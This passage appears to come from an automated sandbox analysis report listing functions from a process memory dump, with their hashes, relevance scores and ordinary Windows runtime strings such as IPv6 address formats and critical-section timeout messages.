                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                              • Instruction ID: 15aab3dfc6eb210d79a611325900e5cd1e88454b55911327b49d8e5d947796ae
                                                              • Opcode Fuzzy Hash: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                              • Instruction Fuzzy Hash: 5390023120240842D100755C4808B47004997E0301F55C116A4124B54EC615C9517621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2CF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
                                                              • Instruction ID: 0cbb256049feda6ee57826decaae356b8c4ba4b9cca100548cf436e926352f7a
                                                              • Opcode Fuzzy Hash: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
                                                              • Instruction Fuzzy Hash: E090023120240403D100755C590C707004997D0201F55D511A4424A58ED65689516221
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
                                                              • Instruction ID: f704e51f2afb24ec5544675b4a581932c02d94c67a0bb58546025a2d23608f54
                                                              • Opcode Fuzzy Hash: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
                                                              • Instruction Fuzzy Hash: E990022160640402D140755C581C707005997D0201F55D111A4024A54EC6598B5567A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2CA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
                                                              • Instruction ID: b869a1ab81f0159d3bc93521e73188a656c628a9c7296d392623c7fcea6c0567
                                                              • Opcode Fuzzy Hash: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
                                                              • Instruction Fuzzy Hash: 0690023120240402D100799C580C647004997E0301F55D111A9024A55FC66589916231
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
                                                              • Instruction ID: ea9a54c076c2736ed19a7cb4ccd9eb3caf8d221ffc09f17832a377a2f9085e0d
                                                              • Opcode Fuzzy Hash: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
                                                              • Instruction Fuzzy Hash: 1C90026121240042D104755C4808707008997E1201F55C112A6154A54DC5298D615225
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
                                                              • Instruction ID: 894fb6dcd607ecbc9c3c32ff19d910e98946b7c5981f91292ffd82e02673c878
                                                              • Opcode Fuzzy Hash: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
                                                              • Instruction Fuzzy Hash: 9190026134240442D100755C4818B070049D7E1301F55C115E5064A54EC619CD526226
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
                                                              • Instruction ID: 900fd6575e1e75818f0791e95d4b5c32515afb8c8203a722667dcf976d8474a8
                                                              • Opcode Fuzzy Hash: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
                                                              • Instruction Fuzzy Hash: 26900221212C0042D200796C4C18B07004997D0303F55C215A4154A54DC91589615621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
                                                              • Instruction ID: 648bb8252994846ce491aec10fda6e9a317f47828dcfb7b96a03b2446a43f20f
                                                              • Opcode Fuzzy Hash: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
                                                              • Instruction Fuzzy Hash: 2490023120280402D100755C4C0C747004997D0302F55C111A9164A55FC665C9916631
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
                                                              • Instruction ID: 032bc80fc6fa715cf7073b431599936399b43ccdea7155d039d0274f888f9db8
                                                              • Opcode Fuzzy Hash: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
                                                              • Instruction Fuzzy Hash: 46900221602400424140756C8C489074049BBE1211755C221A4998A50EC55989655765
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
                                                              • Instruction ID: b5b4ae7d2cbc1f6114c3a5438c225eb048d3008c4537e38c9c71ad3a7c85bc2e
                                                              • Opcode Fuzzy Hash: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
                                                              • Instruction Fuzzy Hash: 7190023120280402D100755C4C1870B004997D0302F55C111A5164A55EC62589516671
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
                                                              • Instruction ID: 647220fea09f81b03be9b0750c41e3fe8ae09ebd120804047654dcc217af34bb
                                                              • Opcode Fuzzy Hash: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
                                                              • Instruction Fuzzy Hash: 4690022130240402D102755C4818607004DD7D1345F95C112E5424A55EC6258A53A232
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
                                                              • Instruction ID: 73d9b1a9abc0de124fff56b5e22687d51ae209ce7fc866932e9cd977816fe1cb
                                                              • Opcode Fuzzy Hash: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
                                                              • Instruction Fuzzy Hash: 1490026120280403D140795C4C08607004997D0302F55C111A6064A55FCA298D516235
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
                                                              • Instruction ID: 03d078a4c6a0c86822d3fef07523c463c000270fd9f2fe8087c0e946f4b3ec36
                                                              • Opcode Fuzzy Hash: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
                                                              • Instruction Fuzzy Hash: 7590027120240402D140755C4808747004997D0301F55C111A9064A54FC6598ED56765
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
                                                              • Instruction ID: 08d7d9b25f7e0e8903b82d98c4785996383126a72bce5afa846d8425b377df2e
                                                              • Opcode Fuzzy Hash: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
                                                              • Instruction Fuzzy Hash: 7990022160240502D101755C4808617004E97D0241F95C122A5024A55FCA258A92A231
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D3010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
                                                              • Instruction ID: abda881e26f87180bd3075001964406442059f563fab1e071ff1154d29ad5777
                                                              • Opcode Fuzzy Hash: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
                                                              • Instruction Fuzzy Hash: 1A90022120284442D140765C4C08B0F414997E1202F95C119A8156A54DC91589555721
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D3090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
                                                              • Instruction ID: e7455696b937326ffb042207b8b1d10aa8f978fac1d165261194e7d6175c8ea8
                                                              • Opcode Fuzzy Hash: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
                                                              • Instruction Fuzzy Hash: 0D90022124240802D140755C8818707004AD7D0601F55C111A4024A54EC6168A6567B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: 6f6ad15721a741acbce91f24dcc87f3e22b429fe3d4e0ed3ea8c24ce9bbeb85f
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                              • Instruction ID: 90acc863a166885aa9b7aab1e1fd5793e7d51a71814bb781c1cad1934677c31c
                                                              • Opcode Fuzzy Hash: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                              • Instruction Fuzzy Hash: 9D51D4A6E04216AECB21DB9DCCA097EFBF8BB48240B10826DE565D7641D374DE5487E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01742410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: ecd555176242f96421d4d6c2f50233fb40f5b72c8e58ee84807cbbfd9d891527
                                                              • Instruction ID: 186bf3990e90f4a60354489d518564dffced88ba61adb237198e16ac71c5c52d
                                                              • Opcode Fuzzy Hash: ecd555176242f96421d4d6c2f50233fb40f5b72c8e58ee84807cbbfd9d891527
                                                              • Instruction Fuzzy Hash: E551E375A00646ABCB20DE9CDD9097FFBF9EF44200B148499F596C7642EBB4DA1087A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01766940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: c2e5fb7fb13e178a9785d3eb712061ed3b48ab11354a13088b58b1419f0703bc
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: 9F021671508342AFD305CF18C894A6BFBE9EFC8704F548A6DF9898B264DB31E945CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: cc4ea423fd65e23e77bf6077ab55f635291a92768cd23f900ac6fa51d1a2158e
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: D981D030E052999FEF258E6CCC917FEBBB2AF46360F1F4119D861A7399C73488418B55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: a9df07b1b70c3a5fc52b6c489b0ae6c34d83544da7864318025fed28726e2bab
                                                              • Instruction ID: 66937214e8a55643d625125b498a92b0324a62bb047766a08bcdd614360b1981
                                                              • Opcode Fuzzy Hash: a9df07b1b70c3a5fc52b6c489b0ae6c34d83544da7864318025fed28726e2bab
                                                              • Instruction Fuzzy Hash: 7221517AE00119ABDB10EF69DC44ABEBBE9EF54650F14012AF905E3201EB30DA11CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017002E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017002BD
                                                              • RTL: Re-Waiting, xrefs: 0170031E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
                                                              • Instruction ID: 0a702d95f2a747d67b1d1c3d2254a63b24a74c900a385798a130b2930f35e34b
                                                              • Opcode Fuzzy Hash: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
                                                              • Instruction Fuzzy Hash: B4E19D30608741DFD726CF28CC84B6ABBE1BB84364F144AADF5A58B2E1D774D985CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01742300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 7ff02e992a60070415e9a48d5cda44b9434f5c757566ea2d641aa31c148e5c9c
                                                              • Instruction ID: 563014a51f3a1fa8674c028ce2732196d0218c9ec6c5880a46fc9e9ceaaa6d3b
                                                              • Opcode Fuzzy Hash: 7ff02e992a60070415e9a48d5cda44b9434f5c757566ea2d641aa31c148e5c9c
                                                              • Instruction Fuzzy Hash: 01318472A00219AFDB20DF2DDC44BEEB7F8EB44610F55455AF949E3201EB30EA548BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01699126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
                                                              • Instruction ID: fbc2fee0d8bcf334896e806c2d250082045b9d7df9ff3ae0ee7fc8b2ead92896
                                                              • Opcode Fuzzy Hash: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
                                                              • Instruction Fuzzy Hash: 198119B1D002699BDB31CB54CC54BEEBBB8AB48714F1041EEEA19B7240D7309E85CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%